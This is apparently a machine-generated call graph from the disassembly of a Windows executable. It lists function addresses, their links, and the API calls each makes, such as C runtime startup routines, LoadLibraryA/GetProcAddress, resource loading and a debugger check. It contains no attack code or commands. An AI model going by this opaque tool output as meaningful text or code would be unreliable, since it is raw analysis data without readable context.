API calls 99148->99150 99151 e73b53 99149->99151 99152 e73b31 59 API calls 99149->99152 99150->99149 99151->99154 99157 e75190 59 API calls Mailbox 99151->99157 99152->99151 99154->98441 99155->98446 99156->98438 99157->99154 99159 e73c43 99158->99159 99160 e73e11 99158->99160 99161 e81207 59 API calls 99159->99161 99164 e73c54 99159->99164 99160->98460 99162 e73e73 99161->99162 99163 e92f70 __cinit 67 API calls 99162->99163 99163->99164 99164->98460 99165->98466 99167 e77e79 99166->99167 99184 e77ef2 99166->99184 99169 eb0adf 99167->99169 99172 e77e90 99167->99172 99178 eb0b09 99167->99178 99168 eb09e9 99171 eb0ad3 99168->99171 99195 e78022 Mailbox 99168->99195 99208 e77eb8 Mailbox 99168->99208 99251 eeccac 277 API calls 99168->99251 99253 eecdc8 277 API calls 2 library calls 99169->99253 99252 eda48d 89 API calls 4 library calls 99171->99252 99176 eb0c37 99172->99176 99190 e77ea1 99172->99190 99172->99208 99174 e753b0 277 API calls 99174->99184 99180 e81c9c 59 API calls 99176->99180 99177 eb09e1 99250 e75190 59 API calls Mailbox 99177->99250 99179 eb0b3d 99178->99179 99185 eb0b21 99178->99185 99179->99169 99183 eea8fd 59 API calls 99179->99183 99180->99208 99181 e7806a 99181->98485 99189 eb0b53 99183->99189 99184->99168 99184->99174 99184->99177 99184->99181 99203 e78015 99184->99203 99210 e77fb2 99184->99210 99254 eda48d 89 API calls 4 library calls 99185->99254 99186 eb0d0b 99193 eb0d41 99186->99193 99259 eec9c9 95 API calls Mailbox 99186->99259 99188 eb0a33 99192 e81c9c 59 API calls 99188->99192 99194 eb0bb7 99189->99194 99207 eb0b6b 99189->99207 99190->99208 99257 ec7aad 59 API calls 99190->99257 99192->99208 99199 e7523c 59 API calls 99193->99199 99255 ed7ed5 59 API calls 99194->99255 99195->99188 99195->99208 99248 ec7aad 59 API calls 99195->99248 99197 eb0ce9 99201 e74d37 84 API calls 99197->99201 99204 e77ee7 99199->99204 99214 eb0cf1 __NMSG_WRITE 99201->99214 99202 eb0d1f 99206 e74d37 84 API calls 99202->99206 99203->99195 99249 eda48d 89 API calls 4 library calls 99203->99249 99204->98485 99218 eb0d27 __NMSG_WRITE 99206->99218 99213 ed789a 59 API calls 99207->99213 99208->99186 99208->99204 99258 eec87c 85 API calls 2 library calls 99208->99258 99209 eb0bc9 99256 e835b9 59 API calls Mailbox 99209->99256 99210->99203 99247 e74230 59 API calls Mailbox 99210->99247 99216 eb0b8d 99213->99216 99214->99186 99217 e7523c 59 API calls 99214->99217 99219 ec6ebc 277 API calls 99216->99219 99217->99186 99218->99193 99221 e7523c 59 API calls 99218->99221 99219->99168 99220 eb0bd2 Mailbox 99222 ed789a 59 API calls 99220->99222 99221->99193 99223 eb0beb 99222->99223 99224 e7b020 277 API calls 99223->99224 99224->99168 99226 e76e4a 99225->99226 99229 e76ff7 99225->99229 99227 e774d0 99226->99227 99226->99229 99230 e76f2c 99226->99230 99236 e76fdb 99226->99236 99227->99236 99264 e749e0 59 API calls wcstoxq 99227->99264 99229->99227 99235 e77076 99229->99235 99229->99236 99241 e76fbb Mailbox 99229->99241 99233 e76f68 99230->99233 99230->99235 99230->99236 99232 eafc1e 99237 eafc30 99232->99237 99262 e93f69 59 API calls __wtof_l 99232->99262 99233->99236 99238 eafa71 99233->99238 99233->99241 99235->99232 99235->99236 99235->99241 99261 ec7aad 59 API calls 99235->99261 99236->98485 99237->98485 99238->99236 99260 e93f69 59 API calls __wtof_l 99238->99260 99241->99232 99241->99236 99263 e741c4 59 API calls Mailbox 99241->99263 99242->98490 99243->98483 99244->98501 99245->98483 99246->98483 99247->99203 99248->99195 99249->99177 99250->99168 99251->99168 99252->99169 99253->99208 99254->99204 99255->99209 99256->99220 99257->99208 99258->99197 99259->99202 99260->99238 99261->99241 99262->99237 99263->99241 99264->99236 99265 e97e83 99266 e97e8f __fcloseall 99265->99266 99302 e9a038 GetStartupInfoW 99266->99302 99269 e97e94 99304 e98dac GetProcessHeap 99269->99304 99270 e97eec 99271 e97ef7 99270->99271 99387 e97fd3 58 API calls 3 library calls 99270->99387 99305 e99d16 99271->99305 99274 e97efd 99275 e97f08 __RTC_Initialize 99274->99275 99388 e97fd3 58 API calls 3 library calls 99274->99388 99326 e9d802 99275->99326 99278 e97f17 99279 e97f23 GetCommandLineW 99278->99279 99389 e97fd3 58 API calls 3 library calls 99278->99389 99345 ea5153 GetEnvironmentStringsW 99279->99345 99282 e97f22 99282->99279 99285 e97f3d 99286 e97f48 99285->99286 99390 e932e5 58 API calls 3 library calls 99285->99390 99355 ea4f88 99286->99355 99289 e97f4e 99290 e97f59 99289->99290 99391 e932e5 58 API calls 3 library calls 99289->99391 99369 e9331f 99290->99369 99293 e97f61 99294 e97f6c __wwincmdln 99293->99294 99392 e932e5 58 API calls 3 library calls 99293->99392 99375 e85f8b 99294->99375 99297 e97f80 99298 e97f8f 99297->99298 99393 e93588 58 API calls _doexit 99297->99393 99394 e93310 58 API calls _doexit 99298->99394 99301 e97f94 __fcloseall 99303 e9a04e 99302->99303 99303->99269 99304->99270 99395 e933b7 36 API calls 2 library calls 99305->99395 99307 e99d1b 99396 e99f6c InitializeCriticalSectionAndSpinCount __mtinitlocknum 99307->99396 99309 e99d20 99310 e99d24 99309->99310 99398 e99fba TlsAlloc 99309->99398 99397 e99d8c 61 API calls 2 library calls 99310->99397 99313 e99d29 99313->99274 99314 e99d36 99314->99310 99315 e99d41 99314->99315 99399 e98a05 99315->99399 99318 e99d83 99407 e99d8c 61 API calls 2 library calls 99318->99407 99321 e99d88 99321->99274 99322 e99d62 99322->99318 99323 e99d68 99322->99323 99406 e99c63 58 API calls 4 library calls 99323->99406 99325 e99d70 GetCurrentThreadId 99325->99274 99327 e9d80e __fcloseall 99326->99327 99328 e99e3b __lock 58 API calls 99327->99328 99329 e9d815 99328->99329 99330 e98a05 __calloc_crt 58 API calls 99329->99330 99332 e9d826 99330->99332 99331 e9d891 GetStartupInfoW 99339 e9d8a6 99331->99339 99342 e9d9d5 99331->99342 99332->99331 99333 e9d831 __fcloseall @_EH4_CallFilterFunc@8 99332->99333 99333->99278 99334 e9da9d 99421 e9daad LeaveCriticalSection _doexit 99334->99421 99336 e98a05 __calloc_crt 58 API calls 99336->99339 99337 e9da22 GetStdHandle 99337->99342 99338 e9da35 GetFileType 99338->99342 99339->99336 99341 e9d8f4 99339->99341 99339->99342 99340 e9d928 GetFileType 99340->99341 99341->99340 99341->99342 99419 e9a05b InitializeCriticalSectionAndSpinCount 99341->99419 99342->99334 99342->99337 99342->99338 99420 e9a05b InitializeCriticalSectionAndSpinCount 99342->99420 99346 e97f33 99345->99346 99347 ea5164 99345->99347 99351 ea4d4b GetModuleFileNameW 99346->99351 99422 e98a4d 58 API calls 2 library calls 99347->99422 99349 ea518a _memmove 99350 ea51a0 FreeEnvironmentStringsW 99349->99350 99350->99346 99352 ea4d7f _wparse_cmdline 99351->99352 99354 ea4dbf _wparse_cmdline 99352->99354 99423 e98a4d 58 API calls 2 library calls 99352->99423 99354->99285 99356 ea4fa1 __NMSG_WRITE 99355->99356 99360 ea4f99 99355->99360 99357 e98a05 __calloc_crt 58 API calls 99356->99357 99365 ea4fca __NMSG_WRITE 99357->99365 99358 ea5021 99359 e92f85 _free 58 API calls 99358->99359 99359->99360 99360->99289 99361 e98a05 __calloc_crt 58 API calls 99361->99365 99362 ea5046 99363 e92f85 _free 58 API calls 99362->99363 99363->99360 99365->99358 99365->99360 99365->99361 99365->99362 99366 ea505d 99365->99366 99424 ea4837 58 API calls __mbstowcs_l_helper 99365->99424 99425 e98ff6 IsProcessorFeaturePresent 99366->99425 99368 ea5069 99368->99289 99371 e9332b __IsNonwritableInCurrentImage 99369->99371 99448 e9a701 99371->99448 99372 e93349 __initterm_e 99373 e92f70 __cinit 67 API calls 99372->99373 99374 e93368 __cinit __IsNonwritableInCurrentImage 99372->99374 99373->99374 99374->99293 99376 e85fa5 99375->99376 99377 e86044 99375->99377 99378 e85fdf IsThemeActive 99376->99378 99377->99297 99451 e9359c 99378->99451 99382 e8600b 99463 e85f00 SystemParametersInfoW SystemParametersInfoW 99382->99463 99384 e86017 99464 e85240 99384->99464 99386 e8601f SystemParametersInfoW 99386->99377 99387->99271 99388->99275 99389->99282 99393->99298 99394->99301 99395->99307 99396->99309 99397->99313 99398->99314 99400 e98a0c 99399->99400 99402 e98a47 99400->99402 99404 e98a2a 99400->99404 99408 ea5426 99400->99408 99402->99318 99405 e9a016 TlsSetValue 99402->99405 99404->99400 99404->99402 99416 e9a362 Sleep 99404->99416 99405->99322 99406->99325 99407->99321 99409 ea5431 99408->99409 99414 ea544c 99408->99414 99410 ea543d 99409->99410 99409->99414 99417 e98d58 58 API calls __getptd_noexit 99410->99417 99412 ea545c RtlAllocateHeap 99413 ea5442 99412->99413 99412->99414 99413->99400 99414->99412 99414->99413 99418 e935d1 DecodePointer 99414->99418 99416->99404 99417->99413 99418->99414 99419->99341 99420->99342 99421->99333 99422->99349 99423->99354 99424->99365 99426 e99001 99425->99426 99431 e98e89 99426->99431 99430 e9901c 99430->99368 99432 e98ea3 _memset __call_reportfault 99431->99432 99433 e98ec3 IsDebuggerPresent 99432->99433 99439 e9a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99433->99439 99436 e98faa 99438 e9a370 GetCurrentProcess TerminateProcess 99436->99438 99437 e98f87 __call_reportfault 99440 e9c826 99437->99440 99438->99430 99439->99437 99441 e9c82e 99440->99441 99442 e9c830 IsProcessorFeaturePresent 99440->99442 99441->99436 99444 ea5b3a 99442->99444 99447 ea5ae9 5 API calls 2 library calls 99444->99447 99446 ea5c1d 99446->99436 99447->99446 99449 e9a704 EncodePointer 99448->99449 99449->99449 99450 e9a71e 99449->99450 99450->99372 99452 e99e3b __lock 58 API calls 99451->99452 99453 e935a7 DecodePointer EncodePointer 99452->99453 99516 e99fa5 LeaveCriticalSection 99453->99516 99455 e86004 99456 e93604 99455->99456 99457 e93628 99456->99457 99458 e9360e 99456->99458 99457->99382 99458->99457 99517 e98d58 58 API calls __getptd_noexit 99458->99517 99460 e93618 99518 e98fe6 9 API calls __mbstowcs_l_helper 99460->99518 99462 e93623 99462->99382 99463->99384 99465 e8524d __ftell_nolock 99464->99465 99466 e81207 59 API calls 99465->99466 99467 e85258 GetCurrentDirectoryW 99466->99467 99519 e84ec8 99467->99519 99469 e8527e IsDebuggerPresent 99470 e8528c 99469->99470 99471 ec0b21 MessageBoxA 99469->99471 99472 ec0b39 99470->99472 99473 e852a0 99470->99473 99471->99472 99642 e8314d 59 API calls Mailbox 99472->99642 99587 e831bf 99473->99587 99476 ec0b49 99484 ec0b5f SetCurrentDirectoryW 99476->99484 99481 e8536c Mailbox 99481->99386 99484->99481 99516->99455 99517->99460 99518->99462 99520 e81207 59 API calls 99519->99520 99521 e84ede 99520->99521 99652 e85420 99521->99652 99523 e84efc 99524 e819e1 59 API calls 99523->99524 99525 e84f10 99524->99525 99526 e81c9c 59 API calls 99525->99526 99527 e84f1b 99526->99527 99666 e7477a 99527->99666 99530 e81a36 59 API calls 99531 e84f34 99530->99531 99532 e739be 68 API calls 99531->99532 99533 e84f44 Mailbox 99532->99533 99534 e81a36 59 API calls 99533->99534 99535 e84f68 99534->99535 99536 e739be 68 API calls 99535->99536 99537 e84f77 Mailbox 99536->99537 99538 e81207 59 API calls 99537->99538 99539 e84f94 99538->99539 99669 e855bc 99539->99669 99542 e9312d _W_store_winword 60 API calls 99543 e84fae 99542->99543 99544 e84fb8 99543->99544 99545 ec0a54 99543->99545 99547 e9312d _W_store_winword 60 API calls 99544->99547 99546 e855bc 59 API calls 99545->99546 99548 ec0a68 99546->99548 99549 e84fc3 99547->99549 99551 e855bc 59 API calls 99548->99551 99549->99548 99550 e84fcd 99549->99550 99552 e9312d _W_store_winword 60 API calls 99550->99552 99553 ec0a84 99551->99553 99554 e84fd8 99552->99554 99556 e900cf 61 API calls 99553->99556 99554->99553 99555 e84fe2 99554->99555 99557 e9312d _W_store_winword 60 API calls 99555->99557 99558 ec0aa7 99556->99558 99559 e84fed 99557->99559 99560 e855bc 59 API calls 99558->99560 99561 ec0ad0 99559->99561 99562 e84ff7 99559->99562 99564 ec0ab3 99560->99564 99563 e855bc 59 API calls 99561->99563 99565 e8501b 99562->99565 99568 e81c9c 59 API calls 99562->99568 99566 ec0aee 99563->99566 99567 e81c9c 59 API calls 99564->99567 99569 e747be 59 API calls 99565->99569 99570 e81c9c 59 API calls 99566->99570 99571 ec0ac1 99567->99571 99572 e8500e 99568->99572 99574 e8502a 99569->99574 99575 ec0afc 99570->99575 99576 e855bc 59 API calls 99571->99576 99573 e855bc 59 API calls 99572->99573 99573->99565 99577 e74540 59 API calls 99574->99577 99578 e855bc 59 API calls 99575->99578 99576->99561 99579 e85038 99577->99579 99580 ec0b0b 99578->99580 99675 e743d0 99579->99675 99580->99580 99582 e7477a 59 API calls 99584 e85055 99582->99584 99583 e743d0 59 API calls 99583->99584 99584->99582 99584->99583 99585 e855bc 59 API calls 99584->99585 99586 e8509b Mailbox 99584->99586 99585->99584 99586->99469 99588 e831cc __ftell_nolock 99587->99588 99589 ec0314 _memset 99588->99589 99590 e831e5 99588->99590 99593 ec0330 GetOpenFileNameW 99589->99593 99591 e90284 60 API calls 99590->99591 99592 e831ee 99591->99592 99691 e909c5 99592->99691 99595 ec037f 99593->99595 99596 e81821 59 API calls 99595->99596 99598 ec0394 99596->99598 99598->99598 99600 e83203 99709 e8278a 99600->99709 99642->99476 99653 e8542d __ftell_nolock 99652->99653 99654 e81821 59 API calls 99653->99654 99659 e85590 Mailbox 99653->99659 99656 e8545f 99654->99656 99655 e81609 59 API calls 99655->99656 99656->99655 99664 e85495 Mailbox 99656->99664 99657 e85563 99658 e81a36 59 API calls 99657->99658 99657->99659 99660 e85584 99658->99660 99659->99523 99662 e84c94 59 API calls 99660->99662 99661 e81a36 59 API calls 99661->99664 99662->99659 99664->99657 99664->99659 99664->99661 99665 e81609 59 API calls 99664->99665 99684 e84c94 99664->99684 99665->99664 99667 e90fe6 Mailbox 59 API calls 99666->99667 99668 e74787 99667->99668 99668->99530 99670 e855df 99669->99670 99671 e855c6 99669->99671 99673 e81821 59 API calls 99670->99673 99672 e81c9c 59 API calls 99671->99672 99674 e84fa0 99672->99674 99673->99674 99674->99542 99676 ead6c9 99675->99676 99678 e743e7 99675->99678 99676->99678 99690 e740cb 59 API calls Mailbox 99676->99690 99679 e744ef 99678->99679 99680 e74530 99678->99680 99681 e744e8 99678->99681 99679->99584 99682 e7523c 59 API calls 99680->99682 99683 e90fe6 Mailbox 59 API calls 99681->99683 99682->99679 99683->99679 99685 e84ca2 99684->99685 99689 e84cc4 _memmove 99684->99689 99687 e90fe6 Mailbox 59 API calls 99685->99687 99686 e90fe6 Mailbox 59 API calls 99688 e84cd8 99686->99688 99687->99689 99688->99664 99689->99686 99690->99678 99692 ea1b70 __ftell_nolock 99691->99692 99693 e909d2 GetLongPathNameW 99692->99693 99694 e81821 59 API calls 99693->99694 99695 e831f7 99694->99695 99696 e82f3d 99695->99696 99697 e81207 59 API calls 99696->99697 99698 e82f4f 99697->99698 99699 e90284 60 API calls 99698->99699 99700 e82f5a 99699->99700 99701 ec0177 99700->99701 99702 e82f65 99700->99702 99707 ec0191 99701->99707 99749 e8151f 61 API calls 99701->99749 99703 e84c94 59 API calls 99702->99703 99705 e82f71 99703->99705 99743 e71307 99705->99743 99708 e82f84 Mailbox 99708->99600 99750 e849c2 99709->99750 99712 ebf8d6 99866 ed9b16 99712->99866 99714 e849c2 136 API calls 99716 e827c3 99714->99716 99716->99712 99719 e827cb 99716->99719 99717 ebf8eb 99924 e84a2f 99717->99924 99718 ebf908 99721 e90fe6 Mailbox 59 API calls 99718->99721 99722 ebf8f3 99719->99722 99723 e827d7 99719->99723 99742 ebf94d Mailbox 99721->99742 99930 ed47e8 90 API calls _wprintf 99722->99930 99774 e829be 99723->99774 99727 ebf901 99727->99718 99728 ebfb01 99736 ebfb12 99739 e81a36 59 API calls 99739->99742 99742->99728 99742->99736 99742->99739 99901 ecfef8 99742->99901 99904 ed793a 99742->99904 99910 e8343f 99742->99910 99918 e83297 99742->99918 99931 ecfe19 61 API calls 2 library calls 99742->99931 99744 e71319 99743->99744 99748 e71338 _memmove 99743->99748 99746 e90fe6 Mailbox 59 API calls 99744->99746 99745 e90fe6 Mailbox 59 API calls 99747 e7134f 99745->99747 99746->99748 99747->99708 99748->99745 99749->99701 99933 e84b29 99750->99933 99755 e849ed LoadLibraryExW 99943 e84ade 99755->99943 99756 ec08bb 99757 e84a2f 84 API calls 99756->99757 99760 ec08c2 99757->99760 99762 e84ade 3 API calls 99760->99762 99764 ec08ca 99762->99764 99763 e84a14 99763->99764 99765 e84a20 99763->99765 99969 e84ab2 99764->99969 99766 e84a2f 84 API calls 99765->99766 99768 e827af 99766->99768 99768->99712 99768->99714 99771 ec08f1 99977 e84a6e 99771->99977 99775 ebfd14 99774->99775 99776 e829e7 99774->99776 100351 ecff5c 89 API calls 4 library calls 99775->100351 100334 e83df7 60 API calls Mailbox 99776->100334 99779 e82a09 100335 e83e47 67 API calls 99779->100335 99780 ebfd27 100352 ecff5c 89 API calls 4 library calls 99780->100352 99782 e82a1e 99782->99780 99784 e82a26 99782->99784 99785 ebfd43 99867 e84a8c 85 API calls 99866->99867 99868 ed9b85 99867->99868 100360 ed9cf1 99868->100360 99871 e84ab2 74 API calls 99872 ed9bb4 99871->99872 99873 e84ab2 74 API calls 99872->99873 99874 ed9bc4 99873->99874 99899 ebf8e7 99899->99717 99899->99718 99905 ed7945 99904->99905 99930->99727 99931->99742 99982 e84b77 99933->99982 99936 e849d4 99940 e9547b 99936->99940 99937 e84b60 FreeLibrary 99937->99936 99938 e84b77 2 API calls 99939 e84b50 99938->99939 99939->99936 99939->99937 99986 e95490 99940->99986 99942 e849e1 99942->99755 99942->99756 100067 e84baa 99943->100067 99946 e84b03 99947 e84a05 99946->99947 99948 e84b15 FreeLibrary 99946->99948 99950 e848b0 99947->99950 99948->99947 99949 e84baa 2 API calls 99949->99946 99951 e90fe6 Mailbox 59 API calls 99950->99951 99952 e848c5 99951->99952 99953 e8433f 59 API calls 99952->99953 99954 e848d1 _memmove 99953->99954 99955 e8490c 99954->99955 99956 ec080a 99954->99956 99958 e84a6e 69 API calls 99955->99958 99957 ec0817 99956->99957 100076 ed9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99956->100076 100077 ed9f5e 95 API calls 99957->100077 99968 e84915 99958->99968 99961 e84ab2 74 API calls 99961->99968 99962 ec0859 100071 e84a8c 99962->100071 99965 e84a8c 85 API calls 99965->99968 99966 e84ab2 74 API calls 99967 e849a0 99966->99967 99967->99763 99968->99961 99968->99962 99968->99965 99968->99967 99970 ec0945 99969->99970 99971 e84ac4 99969->99971 100183 e95802 99971->100183 99974 ed96c4 100308 ed951a 99974->100308 99976 ed96da 99976->99771 99978 e84a7d 99977->99978 99981 ec0908 99977->99981 100313 e95e80 99978->100313 99980 e84a85 99983 e84b44 99982->99983 99984 e84b80 LoadLibraryA 99982->99984 99983->99938 99983->99939 99984->99983 99985 e84b91 GetProcAddress 99984->99985 99985->99983 99988 e9549c __fcloseall 99986->99988 99987 e954af 100035 e98d58 58 API calls __getptd_noexit 99987->100035 99988->99987 99990 e954e0 99988->99990 100005 ea0718 99990->100005 99991 e954b4 100036 e98fe6 9 API calls __mbstowcs_l_helper 99991->100036 99994 e954e5 99995 e954fb 99994->99995 99996 e954ee 99994->99996 99998 e95525 99995->99998 99999 e95505 99995->99999 100037 e98d58 58 API calls __getptd_noexit 99996->100037 100020 ea0837 99998->100020 100038 e98d58 58 API calls __getptd_noexit 99999->100038 100000 e954bf __fcloseall @_EH4_CallFilterFunc@8 100000->99942 100006 ea0724 __fcloseall 100005->100006 100007 e99e3b __lock 58 API calls 100006->100007 100013 ea0732 100007->100013 100008 ea07ad 100045 e98a4d 58 API calls 2 library calls 100008->100045 100011 ea0823 __fcloseall 100011->99994 100012 ea07b4 100018 ea07a6 100012->100018 100046 e9a05b InitializeCriticalSectionAndSpinCount 100012->100046 100013->100008 100014 e99ec3 __mtinitlocknum 58 API calls 100013->100014 100013->100018 100043 e96e7d 59 API calls __lock 100013->100043 100044 e96ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100013->100044 100014->100013 100017 ea07da EnterCriticalSection 100017->100018 100040 ea082e 100018->100040 100028 ea0857 __wopenfile 100020->100028 100021 ea0871 100051 e98d58 58 API calls __getptd_noexit 100021->100051 100023 ea0876 100052 e98fe6 9 API calls __mbstowcs_l_helper 100023->100052 100025 e95530 100039 e95552 LeaveCriticalSection LeaveCriticalSection _fseek 100025->100039 100026 ea0a8f 100048 ea87d1 100026->100048 100028->100021 100034 ea0a2c 100028->100034 100053 e939fb 60 API calls 2 library calls 100028->100053 100030 ea0a25 100030->100034 100054 e939fb 60 API calls 2 library calls 100030->100054 100032 ea0a44 100032->100034 100055 e939fb 60 API calls 2 library calls 100032->100055 100034->100021 100034->100026 100035->99991 100036->100000 100037->100000 100038->100000 100039->100000 100047 e99fa5 LeaveCriticalSection 100040->100047 100042 ea0835 100042->100011 100043->100013 100044->100013 100045->100012 100046->100017 100047->100042 100056 ea7fb5 100048->100056 100050 ea87ea 100050->100025 100051->100023 100052->100025 100053->100030 100054->100032 100055->100034 100057 ea7fc1 __fcloseall 100056->100057 100058 ea7fd7 100057->100058 100061 ea800d 100057->100061 100059 e98d58 __mbstowcs_l_helper 58 API calls 100058->100059 100060 ea7fdc 100059->100060 100062 e98fe6 __mbstowcs_l_helper 9 API calls 100060->100062 100063 ea807e __wsopen_nolock 109 API calls 100061->100063 100066 ea7fe6 __fcloseall 100062->100066 100064 ea8029 100063->100064 100065 ea8052 __wsopen_helper LeaveCriticalSection 100064->100065 100065->100066 100066->100050 100068 e84af7 100067->100068 100069 e84bb3 LoadLibraryA 100067->100069 100068->99946 100068->99949 100069->100068 100070 e84bc4 GetProcAddress 100069->100070 100070->100068 100072 e84a9b 100071->100072 100073 ec0923 100071->100073 100078 e95a6d 100072->100078 100075 e84aa9 100075->99966 100076->99957 100077->99968 100079 e95a79 __fcloseall 100078->100079 100080 e95a8b 100079->100080 100082 e95ab1 100079->100082 100109 e98d58 58 API calls __getptd_noexit 100080->100109 100091 e96e3e 100082->100091 100084 e95a90 100110 e98fe6 9 API calls __mbstowcs_l_helper 100084->100110 100090 e95a9b __fcloseall 100090->100075 100092 e96e4e 100091->100092 100093 e96e70 EnterCriticalSection 100091->100093 100092->100093 100094 e96e56 100092->100094 100095 e95ab7 100093->100095 100096 e99e3b __lock 58 API calls 100094->100096 100097 e959de 100095->100097 100096->100095 100098 e959fc 100097->100098 100099 e959ec 100097->100099 100101 e95a12 100098->100101 100112 e95af0 100098->100112 100182 e98d58 58 API calls __getptd_noexit 100099->100182 100141 e94c5d 100101->100141 100108 e959f1 100111 e95ae8 LeaveCriticalSection LeaveCriticalSection _fseek 100108->100111 100109->100084 100110->100090 100111->100090 100113 e95afd __ftell_nolock 100112->100113 100114 e95b2d 100113->100114 100115 e95b15 100113->100115 100117 e94906 __fclose_nolock 58 API calls 100114->100117 100116 e98d58 __mbstowcs_l_helper 58 API calls 100115->100116 100142 e94c70 100141->100142 100146 e94c94 100141->100146 100143 e94906 __fclose_nolock 58 API calls 100142->100143 100142->100146 100147 e94906 100146->100147 100182->100108 100186 e9581d 100183->100186 100185 e84ad5 100185->99974 100187 e95829 __fcloseall 100186->100187 100188 e9586c 100187->100188 100190 e9583f _memset 100187->100190 100198 e95864 __fcloseall 100187->100198 100189 e96e3e __lock_file 59 API calls 100188->100189 100191 e95872 100189->100191 100213 e98d58 58 API calls __getptd_noexit 100190->100213 100199 e9563d 100191->100199 100194 e95859 100214 e98fe6 9 API calls __mbstowcs_l_helper 100194->100214 100198->100185 100200 e95673 100199->100200 100203 e95658 _memset 100199->100203 100215 e958a6 LeaveCriticalSection LeaveCriticalSection _fseek 100200->100215 100201 e95663 100304 e98d58 58 API calls __getptd_noexit 100201->100304 100203->100200 100203->100201 100206 e956b3 100203->100206 100206->100200 100207 e94906 __fclose_nolock 58 API calls 100206->100207 100210 e957c4 _memset 100206->100210 100216 ea108b 100206->100216 100284 ea0dd7 100206->100284 100306 ea0ef8 58 API calls 3 library calls 100206->100306 100207->100206 100307 e98d58 58 API calls __getptd_noexit 100210->100307 100212 e95668 100305 e98fe6 9 API calls __mbstowcs_l_helper 100212->100305 100213->100194 100214->100198 100215->100198 100217 ea10ac 100216->100217 100218 ea10c3 100216->100218 100219 e98d24 __write 58 API calls 100217->100219 100220 ea17fb 100218->100220 100225 ea10fd 100218->100225 100222 ea10b1 100219->100222 100221 e98d24 __write 58 API calls 100220->100221 100223 ea1800 100221->100223 100224 e98d58 __mbstowcs_l_helper 58 API calls 100222->100224 100226 e98d58 __mbstowcs_l_helper 58 API calls 100223->100226 100264 ea10b8 100224->100264 100227 ea1105 100225->100227 100232 ea111c 100225->100232 100228 ea1111 100226->100228 100229 e98d24 __write 58 API calls 100227->100229 100231 e98fe6 __mbstowcs_l_helper 9 API calls 100228->100231 100230 ea110a 100229->100230 100234 e98d58 __mbstowcs_l_helper 58 API calls 100230->100234 100231->100264 100233 ea1131 100232->100233 100236 ea114b 100232->100236 100237 ea1169 100232->100237 100232->100264 100235 e98d24 __write 58 API calls 100233->100235 100234->100228 100235->100230 100236->100233 100241 ea1156 100236->100241 100238 e98a4d __malloc_crt 58 API calls 100237->100238 100239 ea1179 100238->100239 100242 ea119c 100239->100242 100243 ea1181 100239->100243 100240 ea5e9b __read_nolock 58 API calls 100244 ea126a 100240->100244 100241->100240 100247 ea1af1 __lseeki64_nolock 60 API calls 100242->100247 100245 e98d58 __mbstowcs_l_helper 58 API calls 100243->100245 100246 ea12e3 ReadFile 100244->100246 100251 ea1280 GetConsoleMode 100244->100251 100248 ea1186 100245->100248 100249 ea17c3 GetLastError 100246->100249 100250 ea1305 100246->100250 100247->100241 100252 e98d24 __write 58 API calls 100248->100252 100253 ea17d0 100249->100253 100254 ea12c3 100249->100254 100250->100249 100258 ea12d5 100250->100258 100255 ea12e0 100251->100255 100256 ea1294 100251->100256 100252->100264 100257 e98d58 __mbstowcs_l_helper 58 API calls 100253->100257 100262 e98d37 __dosmaperr 58 API calls 100254->100262 100267 ea12c9 100254->100267 100255->100246 100256->100255 100259 ea129a ReadConsoleW 100256->100259 100260 ea17d5 100257->100260 100266 ea15a7 100258->100266 100258->100267 100270 ea133a 100258->100270 100259->100258 100261 ea12bd GetLastError 100259->100261 100263 e98d24 __write 58 API calls 100260->100263 100261->100254 100262->100267 100263->100267 100264->100206 100265 e92f85 _free 58 API calls 100265->100264 100266->100267 100275 ea16ad ReadFile 100266->100275 100267->100264 100267->100265 100268 ea1427 100268->100267 100270->100268 100271 ea13a6 ReadFile 100270->100271 100285 ea0de2 100284->100285 100290 ea0df7 100284->100290 100286 e98d58 __mbstowcs_l_helper 58 API calls 100285->100286 100287 ea0de7 100286->100287 100288 e98fe6 __mbstowcs_l_helper 9 API calls 100287->100288 100298 ea0df2 100288->100298 100289 ea0e2c 100292 e94906 __fclose_nolock 58 API calls 100289->100292 100290->100289 100291 ea6214 __getbuf 58 API calls 100290->100291 100290->100298 100291->100289 100293 ea0e40 100292->100293 100294 ea0f77 __read 72 API calls 100293->100294 100295 ea0e47 100294->100295 100296 e94906 __fclose_nolock 58 API calls 100295->100296 100295->100298 100297 ea0e6a 100296->100297 100297->100298 100299 e94906 __fclose_nolock 58 API calls 100297->100299 100298->100206 100300 ea0e76 100299->100300 100300->100298 100301 e94906 __fclose_nolock 58 API calls 100300->100301 100302 ea0e83 100301->100302 100304->100212 100305->100200 100306->100206 100307->100212 100311 e9542a GetSystemTimeAsFileTime 100308->100311 100310 ed9529 100310->99976 100312 e95458 __aulldiv 100311->100312 100312->100310 100314 e95e8c __fcloseall 100313->100314 100315 e95e9e 100314->100315 100316 e95eb3 100314->100316 100326 e98d58 58 API calls __getptd_noexit 100315->100326 100318 e96e3e __lock_file 59 API calls 100316->100318 100320 e95eb9 100318->100320 100319 e95ea3 100327 e98fe6 9 API calls __mbstowcs_l_helper 100319->100327 100322 e95af0 __ftell_nolock 67 API calls 100320->100322 100323 e95ec4 100322->100323 100328 e95ee4 LeaveCriticalSection LeaveCriticalSection _fseek 100323->100328 100325 e95eae __fcloseall 100325->99980 100326->100319 100327->100325 100328->100325 100334->99779 100335->99782 100351->99780 100352->99785 100365 ed9d05 __tzset_nolock _wcscmp 100360->100365 100361 e84ab2 74 API calls 100361->100365 100362 ed9b99 100362->99871 100362->99899 100363 ed96c4 GetSystemTimeAsFileTime 100363->100365 100364 e84a8c 85 API calls 100364->100365 100365->100361 100365->100362 100365->100363 100365->100364 100541 e79a6c 100544 e7829c 100541->100544 100543 e79a78 100545 e78308 100544->100545 100546 e782b4 100544->100546 100551 e78331 100545->100551 100553 eda48d 89 API calls 4 library calls 100545->100553 100546->100545 100547 e753b0 277 API calls 100546->100547 100550 e782eb 100547->100550 100549 eb0ed8 100549->100549 100550->100551 100552 e7523c 59 API calls 100550->100552 100551->100543 100552->100545 100553->100549 100554 e84d83 100555 e84dba 100554->100555 100556 e84dd8 100555->100556 100557 e84e37 100555->100557 100594 e84e35 100555->100594 100558 e84ead PostQuitMessage 100556->100558 100559 e84de5 100556->100559 100561 e84e3d 100557->100561 100562 ec09c2 100557->100562 100588 e84e28 100558->100588 100565 e84df0 100559->100565 100566 ec0a35 100559->100566 100560 e84e1a DefWindowProcW 100560->100588 100563 e84e42 100561->100563 100564 e84e65 SetTimer RegisterWindowMessageW 100561->100564 100609 e7c460 10 API calls 